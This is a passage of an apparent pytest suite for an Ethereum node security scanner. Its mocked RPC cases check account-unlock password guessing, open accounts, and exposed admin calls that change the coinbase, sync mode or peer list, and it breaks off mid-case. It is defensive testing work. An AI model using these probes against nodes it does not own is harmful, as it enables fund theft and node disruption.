                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
            {"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock geth unlock error",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock geth unlock not found",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": [],
                },
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock parity no accounts",
    ),
    # TODO: Enable when better infura check in place
    # pytest.param(
    #     AccountUnlock(infura_url="https://infura", wordlist=["test-password"], skip_below=100),
    #     NodeType.PARITY,
    #     ({"status_code": 200, "json": {
    #         "jsonrpc": "2.0",
    #         "id": 1,
    #         "result": [TEST_ADDR],
    #     }}, {"status_code": 200, "json": {}},),
    #     ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
    #     [],
    #     id="AccountUnlock parity infura balance error",
    # ),
    pytest.param(
        AccountUnlock(
            infura_url="https://infura", wordlist=["test-password"], skip_below=100
        ),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock parity too little balance",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
            {"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock parity unlock error",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock parity unlock not found",
    ),
]
# OpenAccounts: eth_accounts followed by eth_getBalance per account. Any open
# account is reported as a MEDIUM issue with its balance; an empty account
# list stops after eth_accounts and logs nothing.
TESTCASES += [
    pytest.param(
        OpenAccounts(infura_url="https://infura"),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"}},
        ),
        ["eth_accounts", "eth_getBalance"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Found account",
                description="Account: 0x06012c8cf97bead5deae237070f9587f8e7a266d Balance: 1",
                severity=Severity.MEDIUM,
                raw_data="0x06012c8cf97bead5deae237070f9587f8e7a266d",
            )
        ],
        id="OpenAccounts geth issue logged",
    ),
    pytest.param(
        OpenAccounts(infura_url="https://infura"),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"}},
        ),
        ["eth_accounts", "eth_getBalance"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Found account",
                description="Account: 0x06012c8cf97bead5deae237070f9587f8e7a266d Balance: 1",
                severity=Severity.MEDIUM,
                raw_data="0x06012c8cf97bead5deae237070f9587f8e7a266d",
            )
        ],
        id="OpenAccounts parity issue logged",
    ),
    pytest.param(
        OpenAccounts(infura_url="https://infura"),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": [],
                },
            },
        ),
        ["eth_accounts"],
        [],
        id="OpenAccounts geth no accounts",
    ),
    # TODO: test error in infura
    # pytest.param(
    #     OpenAccounts(infura_url="https://infura"),
    #     NodeType.GETH,
    #     (
    #         {"status_code": 200, "json": {
    #             "jsonrpc": "2.0",
    #             "id": 1,
    #             "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
    #         }},
    #         {
    #             "status_code": 200,
    #             "json": {
    #                 "id": 1,
    #                 "jsonrpc": "2.0",
    #                 "error": {"message": "Method not found"},
    #             },
    #         },
    #     ),
    #     ["eth_accounts", "eth_getBalance"],
    #     [],
    #     id="OpenAccounts geth accounts not found",
    # ),
    pytest.param(
        OpenAccounts(infura_url="https://infura"),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": [],
                },
            },
        ),
        ["eth_accounts"],
        [],
        id="OpenAccounts parity no accounts",
    ),
    # TODO: test error in infura
    # pytest.param(
    #     OpenAccounts(infura_url="https://infura"),
    #     NodeType.PARITY,
    #     (
    #         {"status_code": 200, "json": {
    #             "jsonrpc": "2.0",
    #             "id": 1,
    #             "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
    #         }},
    #         {
    #             "status_code": 200,
    #             "json": {
    #                 "id": 1,
    #                 "jsonrpc": "2.0",
    #                 "error": {"message": "Method not found"},
    #             },
    #         },
    #     ),
    #     ["eth_accounts", "eth_getBalance"],
    #     [],
    #     id="OpenAccounts parity accounts not found",
    # ),
]
# GethNodeInfo: geth-only. A successful admin_nodeInfo call leaks admin data
# (LOW issue); parity is skipped.
TESTCASES += [
    pytest.param(
        GethNodeInfo(),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": {
                        "important": "stuff",
                    },
                },
            },
        ),
        ["admin_nodeInfo"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin Node Info Leaks",
                description="Admin-only information can be fetched using the admin_nodeInfo RPC "
                "call.",
                severity=Severity.LOW,
                raw_data={"important": "stuff"},
            )
        ],
        id="GethNodeInfo issue logged",
    ),
    pytest.param(
        GethNodeInfo(),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethNodeInfo parity skipped",
    ),
]
# ParityDevLogs: parity-only. A successful parity_devLogs call leaks developer
# logs (CRITICAL issue); geth is skipped; an RPC error logs nothing.
TESTCASES += [
    pytest.param(
        ParityDevLogs(),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityDevLogs geth skipped",
    ),
    pytest.param(
        ParityDevLogs(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_devLogs"],
        [],
        id="ParityDevLogs error skipped",
    ),
    pytest.param(
        ParityDevLogs(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": ["important log stuff"]},
            }
        ],
        ["parity_devLogs"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Developer log information leak",
                description="The node's developer logs can be fetched using the parity_devLogs "
                "RPC call.",
                severity=Severity.CRITICAL,
                raw_data=["important log stuff"],
            )
        ],
        # Fixed: this id previously duplicated "ParityDevLogs geth skipped"
        # (a copy-paste error) even though the case is a parity node with an
        # issue logged; duplicate ids also degrade pytest's -k selection.
        id="ParityDevLogs parity issue logged",
    ),
]
# PeerlistLeak: the peer list leak is probed via parity_netPeers on parity and
# admin_peers on geth (MEDIUM issue on success). RPC errors log nothing, and
# an unknown node type (IPFS) is skipped without any calls.
TESTCASES += [
    pytest.param(
        PeerlistLeak(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "peer stuff"},
            }
        ],
        ["parity_netPeers"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Peer list information leak",
                description="Admin-only peer list information can be fetched with the "
                "parity_netPeers RPC call.",
                severity=Severity.MEDIUM,
                raw_data="peer stuff",
            )
        ],
        id="PeerlistLeak parity issue logged",
    ),
    pytest.param(
        PeerlistLeak(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "peer stuff"},
            }
        ],
        ["admin_peers"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin Peerlist Access",
                description="Admin-only information about the peer list can be fetched using the "
                "admin_peers RPC call.",
                severity=Severity.MEDIUM,
                raw_data="peer stuff",
            )
        ],
        id="PeerlistLeak geth issue logged",
    ),
    pytest.param(
        PeerlistLeak(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["admin_peers"],
        [],
        id="PeerlistLeak geth error",
    ),
    pytest.param(
        PeerlistLeak(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_netPeers"],
        [],
        id="PeerlistLeak parity error",
    ),
    pytest.param(
        PeerlistLeak(),
        NodeType.IPFS,
        [],
        [],
        [],
        id="PeerlistLeak unknown node error",
    ),
]
# ParityGasCeiling: parity-only. A successful parity_setGasCeilTarget call is a
# CRITICAL issue; an RPC error logs nothing; geth is skipped.
TESTCASES += [
    pytest.param(
        ParityGasCeiling(gas_target=1000),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": True},
            }
        ],
        ["parity_setGasCeilTarget"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Gas ceiling target can be changed",
                description="Anyone can change the gas ceiling value using the "
                "parity_setGasCeilTarget RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="ParityGasCeiling parity issue logged",
    ),
    pytest.param(
        ParityGasCeiling(gas_target=1000),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_setGasCeilTarget"],
        [],
        id="ParityGasCeiling parity error",
    ),
    pytest.param(
        ParityGasCeiling(gas_target=1000),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityGasCeiling geth skipped",
    ),
]
# ParityGasFloor: parity-only. Mirrors ParityGasCeiling but for
# parity_setGasFloorTarget (CRITICAL on success, silent on error, geth skipped).
TESTCASES += [
    pytest.param(
        ParityGasFloor(gas_floor=1000),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": True},
            }
        ],
        ["parity_setGasFloorTarget"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Gas floor target can be changed",
                description="Anyone can change the gas floor value using the "
                "parity_setGasFloorTarget RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="ParityGasFloor parity issue logged",
    ),
    pytest.param(
        ParityGasFloor(gas_floor=1000),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_setGasFloorTarget"],
        [],
        id="ParityGasFloor parity error",
    ),
    pytest.param(
        ParityGasFloor(gas_floor=1000),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityGasFloor geth skipped",
    ),
]
# ParityChangeCoinbase: parity-only. A successful parity_setAuthor call is a
# CRITICAL issue (miner payouts can be redirected); geth skipped; error silent.
TESTCASES += [
    pytest.param(
        ParityChangeCoinbase(author="0x0"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["parity_setAuthor"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Coinbase address change possible",
                description="Anyone can change the coinbase address and redirect miner payouts using the parity_setAuthor RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="ParityChangeCoinbase parity issue logged",
    ),
    pytest.param(
        ParityChangeCoinbase(author="0x0"),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityChangeCoinbase geth skipped",
    ),
    pytest.param(
        ParityChangeCoinbase(author="0x0"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_setAuthor"],
        [],
        id="ParityChangeCoinbase parity error",
    ),
]
# ParityChangeTarget: parity-only. A successful parity_setChain call is a
# CRITICAL issue; geth skipped; error silent.
TESTCASES += [
    pytest.param(
        ParityChangeTarget(target_chain="test"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["parity_setChain"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Chain preset change possible",
                description="Anyone can change the node's target chain value using the parity_setChain RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="ParityChangeTarget parity issue logged",
    ),
    pytest.param(
        ParityChangeTarget(target_chain="test"),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityChangeTarget geth skipped",
    ),
    pytest.param(
        ParityChangeTarget(target_chain="test"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_setChain"],
        [],
        id="ParityChangeTarget parity error",
    ),
]
# ParityChangeExtra: parity-only. A successful parity_setExtraData call is a
# LOW issue; geth skipped; error silent.
TESTCASES += [
    pytest.param(
        ParityChangeExtra(extra_data="pwn'd"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["parity_setExtraData"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Extra data change possible",
                description="Anyone can change the extra data attached to newly mined blocks using the parity_setExtraData RPC call.",
                severity=Severity.LOW,
                raw_data=True,
            )
        ],
        id="ParityChangeExtra parity issue logged",
    ),
    pytest.param(
        ParityChangeExtra(extra_data="pwn'd"),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityChangeExtra geth skipped",
    ),
    pytest.param(
        ParityChangeExtra(extra_data="pwn'd"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_setExtraData"],
        [],
        id="ParityChangeExtra parity error",
    ),
]
# ParitySyncMode: parity-only. A successful parity_setMode call is a CRITICAL
# issue; geth skipped; error silent.
TESTCASES += [
    pytest.param(
        ParitySyncMode(mode="offline"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["parity_setMode"],
        [
            Issue(
                uuid=TEST_UUID,
                title="The sync mode can be changed",
                description="Anyone can change the node's sync mode using the parity_setMode RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="ParitySyncMode parity issue logged",
    ),
    pytest.param(
        ParitySyncMode(mode="offline"),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParitySyncMode geth skipped",
    ),
    pytest.param(
        ParitySyncMode(mode="offline"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            }
        ],
        ["parity_setMode"],
        [],
        id="ParitySyncMode parity error",
    ),
]
# MiningStatus: eth_mining is compared against the expected `should_mine`
# flag. Matches log nothing; mismatches log a MEDIUM issue either way.
# Cases are mirrored for geth and parity.
TESTCASES += [
    pytest.param(
        MiningStatus(should_mine=True),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["eth_mining"],
        [],
        id="MiningStatus geth is and should be mining",
    ),
    pytest.param(
        MiningStatus(should_mine=False),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["eth_mining"],
        [],
        id="MiningStatus geth is not and should not be mining",
    ),
    pytest.param(
        MiningStatus(should_mine=False),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["eth_mining"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Mining Status",
                description="The node should not be mining but is",
                severity=Severity.MEDIUM,
                raw_data=True,
            )
        ],
        # Fixed: id previously read "geth not mining but should be", which
        # describes the opposite scenario (should_mine=False, result=True here).
        id="MiningStatus geth is mining but should not be",
    ),
    pytest.param(
        MiningStatus(should_mine=True),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["eth_mining"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Mining Status",
                description="The node should be mining but isn't",
                severity=Severity.MEDIUM,
                raw_data=False,
            )
        ],
        id="MiningStatus geth should be mining but is not",
    ),
    pytest.param(
        MiningStatus(should_mine=True),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["eth_mining"],
        [],
        id="MiningStatus parity is and should be mining",
    ),
    pytest.param(
        MiningStatus(should_mine=False),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["eth_mining"],
        [],
        id="MiningStatus parity is not and should not be mining",
    ),
    pytest.param(
        MiningStatus(should_mine=False),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["eth_mining"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Mining Status",
                description="The node should not be mining but is",
                severity=Severity.MEDIUM,
                raw_data=True,
            )
        ],
        # Fixed: same inverted wording as the geth case above.
        id="MiningStatus parity is mining but should not be",
    ),
    pytest.param(
        MiningStatus(should_mine=True),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["eth_mining"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Mining Status",
                description="The node should be mining but isn't",
                severity=Severity.MEDIUM,
                raw_data=False,
            )
        ],
        id="MiningStatus parity should be mining but is not",
    ),
]
# HashrateStatus: eth_hashrate returns 0x3e8 (= 1000). Expected hashrates of
# 1000 (equal) and 100 (lower than actual) pass; 10000 (higher than actual)
# logs a MEDIUM issue. Mirrored for geth and parity.
TESTCASES += [
    pytest.param(
        HashrateStatus(expected_hashrate=1000),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x3e8",
                },
            }
        ],
        ["eth_hashrate"],
        [],
        id="HashrateStatus geth hashrate equals",
    ),
    pytest.param(
        HashrateStatus(expected_hashrate=100),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x3e8",
                },
            }
        ],
        ["eth_hashrate"],
        [],
        id="HashrateStatus geth hashrate larger",
    ),
    pytest.param(
        HashrateStatus(expected_hashrate=10000),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x3e8",
                },
            }
        ],
        ["eth_hashrate"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Mining Hashrate Low",
                description="The hashrate should be >= 10000 but only is 1000",
                severity=Severity.MEDIUM,
                raw_data=1000,
            )
        ],
        id="HashrateStatus geth hashrate smaller",
    ),
    pytest.param(
        HashrateStatus(expected_hashrate=1000),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x3e8",
                },
            }
        ],
        ["eth_hashrate"],
        [],
        id="HashrateStatus parity hashrate equals",
    ),
    pytest.param(
        HashrateStatus(expected_hashrate=100),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x3e8",
                },
            }
        ],
        ["eth_hashrate"],
        [],
        id="HashrateStatus parity hashrate larger",
    ),
    pytest.param(
        HashrateStatus(expected_hashrate=10000),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x3e8",
                },
            }
        ],
        ["eth_hashrate"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Mining Hashrate Low",
                description="The hashrate should be >= 10000 but only is 1000",
                severity=Severity.MEDIUM,
                raw_data=1000,
            )
        ],
        id="HashrateStatus parity hashrate smaller",
    ),
]
# NetworkListening: net_listening == False logs a HIGH issue; True logs
# nothing. Mirrored for geth and parity.
TESTCASES += [
    pytest.param(
        NetworkListening(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["net_listening"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Node not listening to peers",
                description="The node is not listening to new peer requests",
                severity=Severity.HIGH,
                raw_data=False,
            )
        ],
        id="NetworkListening parity issue logged",
    ),
    pytest.param(
        NetworkListening(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["net_listening"],
        [],
        id="NetworkListening parity no issue",
    ),
    pytest.param(
        NetworkListening(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["net_listening"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Node not listening to peers",
                description="The node is not listening to new peer requests",
                severity=Severity.HIGH,
                raw_data=False,
            )
        ],
        id="NetworkListening geth issue logged",
    ),
    pytest.param(
        NetworkListening(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["net_listening"],
        [],
        id="NetworkListening geth no issue",
    ),
]
# PeerCountStatus: net_peerCount returns 0x2 (= 2 peers). Minimums of 2
# (equal) and 1 (below actual) pass; 10 (above actual) logs a MEDIUM issue.
# Mirrored for geth and parity.
TESTCASES += [
    pytest.param(
        PeerCountStatus(minimum_peercount=2),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x2",
                },
            }
        ],
        ["net_peerCount"],
        [],
        id="PeerCountStatus geth peer count equals",
    ),
    pytest.param(
        PeerCountStatus(minimum_peercount=1),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x2",
                },
            }
        ],
        ["net_peerCount"],
        [],
        id="PeerCountStatus geth peer count larger",
    ),
    pytest.param(
        PeerCountStatus(minimum_peercount=10),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x2",
                },
            }
        ],
        ["net_peerCount"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Number of peers too low!",
                description="Too few peers (current < minimum): 2 < 10",
                severity=Severity.MEDIUM,
                raw_data=2,
            )
        ],
        id="PeerCountStatus geth peer count smaller",
    ),
    pytest.param(
        PeerCountStatus(minimum_peercount=2),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x2",
                },
            }
        ],
        ["net_peerCount"],
        [],
        id="PeerCountStatus parity peer count equals",
    ),
    pytest.param(
        PeerCountStatus(minimum_peercount=1),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x2",
                },
            }
        ],
        ["net_peerCount"],
        [],
        id="PeerCountStatus parity peer count larger",
    ),
    pytest.param(
        PeerCountStatus(minimum_peercount=10),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0x2",
                },
            }
        ],
        ["net_peerCount"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Number of peers too low!",
                description="Too few peers (current < minimum): 2 < 10",
                severity=Severity.MEDIUM,
                raw_data=2,
            )
        ],
        id="PeerCountStatus parity peer count smaller",
    ),
]
# PeerlistManipulation: probes admin_addPeer on geth and
# parity_addReservedPeer on parity. result=True logs a HIGH issue,
# result=False logs nothing, unknown node types (IPFS) are skipped.
TESTCASES += [
    pytest.param(
        PeerlistManipulation(test_enode="test"),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["admin_addPeer"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Peer list manipulation",
                description="Arbitrary peers can be added using the admin_addPeer RPC call.",
                severity=Severity.HIGH,
                raw_data=True,
            )
        ],
        id="PeerlistManipulation geth issue logged",
    ),
    pytest.param(
        PeerlistManipulation(test_enode="test"),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["admin_addPeer"],
        [],
        id="PeerlistManipulation geth no issue",
    ),
    pytest.param(
        PeerlistManipulation(test_enode="test"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["parity_addReservedPeer"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Peer list manipulation",
                description="Reserved peers can be added to the node's peer list using the parity_addReservedPeer RPC call",
                severity=Severity.HIGH,
                raw_data=True,
            )
        ],
        id="PeerlistManipulation parity issue logged",
    ),
    pytest.param(
        PeerlistManipulation(test_enode="test"),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["parity_addReservedPeer"],
        [],
        id="PeerlistManipulation parity no issue",
    ),
    pytest.param(
        PeerlistManipulation(test_enode="test"),
        NodeType.IPFS,
        [],
        [],
        [],
        id="PeerlistManipulation unknown node no issue",
    ),
]
# ParityDropPeers: parity-only. parity_dropNonReservedPeers returning True is
# a CRITICAL issue; False logs nothing; geth is skipped.
TESTCASES += [
    pytest.param(
        ParityDropPeers(),
        NodeType.GETH,
        [],
        [],
        [],
        id="ParityDropPeers geth skipped",
    ),
    pytest.param(
        ParityDropPeers(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["parity_dropNonReservedPeers"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Peer list manipulation",
                description="Anyone can drop the non-reserved peerlist on the node using the parity_dropNonReservedPeers RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="ParityDropPeers parity issue logged",
    ),
    pytest.param(
        ParityDropPeers(),
        NodeType.PARITY,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["parity_dropNonReservedPeers"],
        [],
        id="ParityDropPeers parity no issue",
    ),
]
# GethStartRPC: geth-only. admin_startRPC returning True is a CRITICAL issue;
# False logs nothing; parity is skipped.
TESTCASES += [
    pytest.param(
        GethStartRPC(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["admin_startRPC"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin RPC Start Rights",
